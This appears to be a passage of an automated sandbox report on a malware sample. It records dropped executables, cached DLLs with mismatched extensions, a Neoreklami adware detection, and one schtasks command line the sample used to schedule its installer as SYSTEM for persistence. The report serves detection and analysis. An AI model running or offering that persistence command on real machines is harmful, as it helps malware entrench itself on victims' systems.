Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\libssl-1_1.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File created: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] Jump to dropped file

Boot Survival
barindex
Yara detected Neoreklami
Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Creates job files (autostart)
Source: C:\Windows\SysWOW64\schtasks.exe File created: C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 11_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 11_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004241EC IsIconic,SetActiveWindow,SetFocus, 11_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004241A4 IsIconic,SetActiveWindow, 11_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 11_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 11_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 11_2_004833BC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004175A8 IsIconic,GetCapture, 11_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00417CDE IsIconic,SetWindowPos, 11_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 11_2_00417CE0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 11_2_0041F128
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
